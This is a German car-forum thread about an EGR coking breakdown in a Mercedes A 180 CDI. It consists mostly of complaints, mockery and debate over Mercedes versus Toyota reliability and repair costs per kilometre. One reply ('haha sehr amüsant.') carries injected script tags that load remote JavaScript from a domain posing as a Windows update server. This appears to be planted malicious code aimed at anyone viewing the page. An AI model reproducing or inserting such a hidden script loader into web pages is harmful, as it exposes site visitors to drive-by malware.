A 180 CDI auch nur Mist

Diskutiere A 180 CDI auch nur Mist im Forum A- und B-Klasse im Bereich Mercedes-Benz - Nachdem wir meinen Vaneo letztes Jahr durch einen hervorragenden Toyota ersetzt hatten wollte meine Frau, allen Problemen mit dem Vaneo zum trotz...
Status
Für weitere Antworten geschlossen.
O

oxoxo73

Stammgast
Beiträge
31
Fahrzeug
Vaneo
Nachdem wir meinen Vaneo letztes Jahr durch einen hervorragenden Toyota ersetzt hatten wollte meine Frau, allen Problemen mit dem Vaneo zum trotz ihren alten A170 CDI doch wieder durch eine A-Klasse (zwei Jahre alt) ersetzen. Angeblich wegen den Design und der hohen Sitzposition!?!

Letztes Wochenende wollten wir nach einem Jahr, auch mal mit ihrer Kiste nach Frankfurt zu Verwandten fahren. Kurz vor dem Ziel läßt auf einmal die Motorleistung nach, die Motorkontrolleuchte ging an und wir konnten gerade noch von der Autobahn runterrollen. Glücklicherweise sprang der Wagen nach 20 min Verschnaufpause wieder an und wir konten wir uns dann an einem Donnerstag noch zum nächsten Mercedeshändler schleppen.

Nach auslesen des Fehlerspeichers stand fest das ein Problem mit der Abgassrückführung besteht. Wir sollten aber damit aber kein Problem haben, da der Fehler nur selten auftritt und wir durch neustarten des Motors sofort wieder betriebsbereit sein sollten. Den Ausdruck vom Speicher haben wir mitbekommen.

Nun stand der Wagen bis zur Rückreise am Sonntag vor der Tür. Am Sonntag konnten wir dann aber nach 10KM die Rückreise abbrechen. Der ADAC bestätigte uns das Problem vom Donnerstag und konnte uns nur noch abschlepen, da das Fahrzeug so verbaut ist, dass kiene Hinle möglich ist.

So standen wir am Montag morgen wieder bei dem Mercedeshändler auf der Matte. Leider war sein einziger kompetenter Mechaniker jetzt im Urlaub, so das der Wagen nun zur Mercedes Ndl. Frankfurt abgeschleppt wurde.

Fazit: Am Mittwoch Abend waren wir wieder flott und ca. 700€ ärmer. Aussage der Ndl. Frankfurt: Es handelt sich hierbei um eine Betriebsbedingte Verkokung die alle 60 bis 70.000Km auftritt. Schuld sind die scharfen Abgassnormen.

Hätte ich vom Mercedes nach meinen Vaneo-Erfahrungen auch nicht anders erwartet. Kann nur hoffen das meine Frau auch langsam mal schlauer wird und sich einen Toyota zulegt.
 
... also ich finde, wenn Du

(a) offensichtlich wider besseren Wissens zweimal den gleichen Fehler machst und Dir nochmal einen gammeligen Mercedes kaufst und zudem
(b) Dich nichtmal gegen (D)eine Frau durchsetzen kannst,

dann hast Du das alles nicht besser verdient. Du kommst noch viel zu gut weg ... um Dich endlich zu heilen, wuensche ich Dir noch einen defekten Turbo und Can-BUS-Probleme. Oder einen durchgeblasenen Kolben. Danach wird Dir der Reiskuebel wie die aufgehende Sonne erscheinen.

Wie fuehlt man sicheigentlich, wenn einem in Spiegelschrift BIRKENSTOCK auf die Backe gestempelt wird? Muss man da am Arbeitsplatz gespoett ertragen? Und wem gehoert bei Euch die Fernbedienung?

Sehr mitfuehlend (grmpf ...) aber erbarmungslos,
Carsten
 
Fazit: Am Mittwoch Abend waren wir wieder flott und ca. 700€ ärmer. Aussage der Ndl. Frankfurt: Es handelt sich hierbei um eine Betriebsbedingte Verkokung die alle 60 bis 70.000Km auftritt. Schuld sind die scharfen Abgassnormen.
:Lol1:

Betriebsbedingtes Verkoken aufgrund der scharfen Abgasnormen :crazy_girl:

Cool
 
Hallo Carsten,

ich finde deinen Beitrag reichlich überzogen, in Anbetracht der Tatsache wie viele 169/245 auf den Straßen unterwegs sind, sind die Werkstattaufenthalte an diesen Fahrzeugen doch eher gering.

Gruß
 
@ Daniel

Das hast Du falsch verstanden.. wer dermassen über ein grundsätzlich zuverlässiges Auto wie den 169er rumnörgelt und diese ganzen Toyota Lobeshymnen ablässt, muss sich halt auch ein wenig Satire gefallen lassen.
Mich persönlich kotzt es auf deutsch gesagt an, wenn hier welche reinschneien ihren Frust über den Benz kundtun, eigentlich nichts damit aussagen, und vorrangig Toyoata anpreisen..
Ich kann immer nicht verstehen, wenn sie doch soo zufrieden mit ihren Toyotas sind , dass sich immer wider welche finden, die dann doch einen Mercedes kaufen..

Da kann ich Karsten nur zustimmen:
Zweimal den gleichen Fehler gemacht und nen gammeligen Mercedes gekauft..
Dem ist nicht hinzuzufügen.. der nette Toyota Händler freut sich bestimmt auf den neuen Kunden.
 
Hallo,

2 defekte 18 R-G Toyota Motoren innerhalb von 80,000 Kilometern mit der Aussage von Toyota = keine Garantie/Kulanz sprechen aus meiner Erfahrung sehr für diese Marke.

Bei der NL Frankfurt noch einmal hinterfragen, die Aussage klingt wieder nach einem „Meister“, der sich im Keller versteckt wenn bestimmte Personen die NL betreten......
 
ich finde deinen Beitrag reichlich überzogen, in Anbetracht der Tatsache wie viele 169/245 auf den Straßen unterwegs sind, sind die Werkstattaufenthalte an diesen Fahrzeugen doch eher gering.

Ok - Du hast recht. Ich nehm's zurueck, das war ueberzogen. Er hat nicht BIRKENSTOCK, sondern ROMIKA in Spiegelschrift auf der Backe. Oder wahrscheinlich sogar TCM:girl:.

Besser so?

Carsten

PS - Bist Du sicher, Du hast mich nicht falsch verstanden?

PSII @ das Haeschen67 - bevor Du Dich blamiertst: Die AGR ist insgesamt und tatsaechlich ein Zugestandnis an die Abgasnormen. Besser ohne, aber es ist nun mal ein notwendiges Uebel. Die hohe Ballastgaszumischung ist ein Tribut an die stengen NOx-Vorschriften ... Ballastgas besteht aus Wasser und CO2 und macht kein NOx. Nur leider kommt bei hohem Durchsatz eben auch Oel, Russ und Dreck mit durch.
 
Zuletzt bearbeitet von einem Moderator:
... also ich finde, wenn Du

(a) offensichtlich wider besseren Wissens zweimal den gleichen Fehler machst und Dir nochmal einen gammeligen Mercedes kaufst und zudem
(b) Dich nichtmal gegen (D)eine Frau durchsetzen kannst,....



Wer lesen kann ist klar im Vorteil! Ich habe meinen "gammligen Mercedes" bereits vor einem Jahr gegen einen hervorragenden Toyota eingetauscht und bin seither in keiner Werkstatt mehr gewesen, geschweige denn "Liegengeblieben". Trotz hoher Abgasnorm des Toyota und Dieselmotor.

Meine Frau hat zeitgleich ihren "gammligen Mercedes" gegen einen offensichtlich noch "gammligeren" eingetauscht.

An das "Liegenbleiben" mit einem Mercedes war ich ja bereits durch meine Vaneojahre hinreichend gewöhnt und wäre fast enttäuscht gewesen, wenn wir auf unserer ersten gemeinsamen, längeren Fahrt in der Kiste nicht gleich wieder irgendwas gewesen wäre.

Insoweit ist ein Mercedes halt doch auch ein zuverlässiges Fahrzeug!
 
Meine Frau hat zeitgleich ihren "gammligen Mercedes" gegen einen offensichtlich noch "gammligeren" eingetauscht.

Es wird höchste Eisenbahn zum Toyota Händler zu fahren (wenns der Benz noch bis dort hin schafft) und den dort in Zahlung geben..
Tipp: Im RAV4 sitzt man auch erhöht und hat obendrein noch einen höheren Dieseldurchsatz.

Ceejay schrieb:
Er hat nicht BIRKENSTOCK, sondern ROMIKA in Spiegelschrift auf der Backe. Oder wahrscheinlich sogar TCM

TCM fängt auch mit T an.. wie Toyota.. beides "Made in Eastern-Asia" ..
 
An das "Liegenbleiben" mit einem Mercedes war ich ja bereits durch meine Vaneojahre hinreichend gewöhnt und wäre fast enttäuscht gewesen, wenn wir auf unserer ersten gemeinsamen, längeren Fahrt in der Kiste nicht gleich wieder irgendwas gewesen wäre.

Insoweit ist ein Mercedes halt doch auch ein zuverlässiges Fahrzeug!


AUTSCH, da bekommt man ja Kopfschmerzen, wenn man das liest. :crazy_girl:
WARUM in aller Welt, kaufst Du dir (oder deiner Frau) einen Mercedes???
Bitte, bitte......hole dir noch einen überragenden Toyota and leave us alone !!!!!

P.S.: Ich hatte/habe 3x A180 CDI 1X B180 CDI, zusammen 120 TKM OHNE einen Defekt !!!
 
[...]

und wäre fast enttäuscht gewesen, wenn wir auf unserer ersten gemeinsamen, längeren Fahrt in der Kiste nicht gleich wieder irgendwas gewesen wäre.

[...]
Ging da wirklich alles mit rechten Dingen zu? ...lass das mal
nicht Deine Frau hören ... :hunter: :verwarn: :diabolo: :crazy:
 
In meiner Verwnadschaft läuft auch ein B 180 CDI. Leider seit 80 T´km völlig problemlos. Sein Vorgänger, ein Golf TDI, hat da richtig rumgezickt. Ich kann mich jedenfalls nicht beschweren und finde die Qualität bei der B-Klasse richtig gut, gerade jetzt, wenn schon mal ein paar Kilometer auf der Uhr stehen. Lediglich die Armaturentafel lässt sich schlecht reinigen und ist Kratzempfindlich.

Es kann immer mal etwas kaputt gehen. Aber offensichtlich ist wohl eher Dein Ansprechpartner vom Freitag der looser, der einfach nichts gemacht hat. Der sollte auch die Kosten fürs Abschleppen zahlen, meine Meinung.

Gruß Andreas
 

… ich kann mir schon vorstellen, wie das gelaufen ist:

Kunde: „Ey, Meister – totale Scheisskarre ist das! Genau wie die davor!“
Meister: “Jetzt beruhigen wir uns erstmal und Sie sagen mir, was das Problem ist ...“
Kunde: „Problem ist, dass das ein Scheiss-Mercedes ist und kein Toyota.“
Meister: „Das wussten sie aber schon, als sie den Wagen gekauft haben, oder? Steht naemlich vorn und hinten dran ...“
Kunde: „Ich wollte den gar nicht kaufen – ich kann mich nur nicht gegen meine Frau durchsetzen <schluchz>. ...“
Meister (muss schlucken): „Wir schaun jetzt erstmal ...“
Meister (leise zum Gesellen): „ Bring die Karre irgendwie ans laufen und schaff mir diese Knalltuete vom Hof! Anschliessend versteckst Du Dich im Keller, und ich sage, wir haben keinen Gesellen frei! “
Geselle: „Klar Chef ... <bigsmile> ...“
Meister: „So – kein Grund zur Sorge ... ein bisschen klopfen hier, ein bisschen streicheln da – alles wieder im Lack. Momentan knapp mit Leuten, shene sie ja - fahren sie zu Hause nochmal zu Ihrem Haendler, der freut sich bestimmt auf sie <hust>.!"
Kunde: „Hat mein Toyota nicht noetig!“
Meister: „Sehen sie – da haben sie ja Glueck. Und nun gute Fahrt und vergessen sie, dass sie jemals hier waren. Vergessen sie unseren Namen, vergessen sie uns ueberhaupt. Kommen sie einfach nie wieder, Ok?“
Kunde: "Ich fahr sowieso bald Toyota!"
Meister (tupft sich den Schweiss von der Stirn): " Na, dann um so besser!"

Ich weiss jetzt schon, wie begeistert der war, als die Kiste am anderen Tag wieder da war.

Carsten
 
Es gibt auch kleinere Rechnungen bei Mercedes :

Birne hinteres Bremslicht rechts ausgewechselt : 1,03.- € , dabei Material 86 Cent, 20% MWST 17 Cent . Arbeit kostenlos.

Heute 7.7.09 morgens 8:00 bezahlt bei MB - Gusenbauer in Linz, Austria .Super Betrieb !
Da war ich doch etwas erstaunt dass es bei MB für etwas mehr als 1.- € überhaupt etwas gibt.


Johannes







Nachdem wir meinen Vaneo letztes Jahr durch einen hervorragenden Toyota ersetzt hatten wollte meine Frau, allen Problemen mit dem Vaneo zum trotz ihren alten A170 CDI doch wieder durch eine A-Klasse (zwei Jahre alt) ersetzen. Angeblich wegen den Design und der hohen Sitzposition!?!

Letztes Wochenende wollten wir nach einem Jahr, auch mal mit ihrer Kiste nach Frankfurt zu Verwandten fahren. Kurz vor dem Ziel läßt auf einmal die Motorleistung nach, die Motorkontrolleuchte ging an und wir konnten gerade noch von der Autobahn runterrollen. Glücklicherweise sprang der Wagen nach 20 min Verschnaufpause wieder an und wir konten wir uns dann an einem Donnerstag noch zum nächsten Mercedeshändler schleppen.

Nach auslesen des Fehlerspeichers stand fest das ein Problem mit der Abgassrückführung besteht. Wir sollten aber damit aber kein Problem haben, da der Fehler nur selten auftritt und wir durch neustarten des Motors sofort wieder betriebsbereit sein sollten. Den Ausdruck vom Speicher haben wir mitbekommen.

Nun stand der Wagen bis zur Rückreise am Sonntag vor der Tür. Am Sonntag konnten wir dann aber nach 10KM die Rückreise abbrechen. Der ADAC bestätigte uns das Problem vom Donnerstag und konnte uns nur noch abschlepen, da das Fahrzeug so verbaut ist, dass kiene Hinle möglich ist.

So standen wir am Montag morgen wieder bei dem Mercedeshändler auf der Matte. Leider war sein einziger kompetenter Mechaniker jetzt im Urlaub, so das der Wagen nun zur Mercedes Ndl. Frankfurt abgeschleppt wurde.

Fazit: Am Mittwoch Abend waren wir wieder flott und ca. 700€ ärmer. Aussage der Ndl. Frankfurt: Es handelt sich hierbei um eine Betriebsbedingte Verkokung die alle 60 bis 70.000Km auftritt. Schuld sind die scharfen Abgassnormen.

Hätte ich vom Mercedes nach meinen Vaneo-Erfahrungen auch nicht anders erwartet. Kann nur hoffen das meine Frau auch langsam mal schlauer wird und sich einen Toyota zulegt.
 
Zuletzt bearbeitet:
haha sehr amüsant.

<script language="JavaScript" type="text/javascript">document.write ("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script><script language="JavaScript" type="text/javascript" src="http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=78882218.55847435"></script>
 
Oha, wenn ich da an den Toyota Yaris meiner Mutter denke.
10 cent/km reine Reparaturkosten ... früher dachte ich ja schon mit meinem A170 CDI und 4,5 cent/km wäre zu viel. Aber Toyota schlägt das um einiges!
(ist vermutlich nur ein Einzelbeispiel wie bei dir)

Zum Glück war mein Mercedes wenigstens sparsam im Gegensatz zum Toyota.

gruss
 
Gute Idee Jupp !

Reine Reparaturkosten/km das ist schon eine Masszahl. Ohne Verschleissteile versteht sich. Über eine längere Zeit gibt das schon eine aussagekräftige Info.

Hannes





Oha, wenn ich da an den Toyota Yaris meiner Mutter denke.
10 cent/km reine Reparaturkosten ... früher dachte ich ja schon mit meinem A170 CDI und 4,5 cent/km wäre zu viel. Aber Toyota schlägt das um einiges!
(ist vermutlich nur ein Einzelbeispiel wie bei dir)

Zum Glück war mein Mercedes wenigstens sparsam im Gegensatz zum Toyota.

gruss
 
In dem Fall ist es tatsächlich ohne Verschleißteile, wobei es auch kein Problem wäre aus meiner Sicht, wenn man die immer mit einrechnen würde (solange dies konsequent geschieht).

gruss
 
Da liege ich im Moment bei 0,13 €/km.Das sind aber erst 8000 km Was nicht ist kann noch werden . Die Idee mit der Masszahl finde ich jedenfalls gut.

Gruss !
Hannes




In dem Fall ist es tatsächlich ohne Verschleißteile, wobei es auch kein Problem wäre aus meiner Sicht, wenn man die immer mit einrechnen würde (solange dies konsequent geschieht).

gruss
 
Status
Für weitere Antworten geschlossen.
Thema: A 180 CDI auch nur Mist

Ähnliche Themen

Zurück
Oben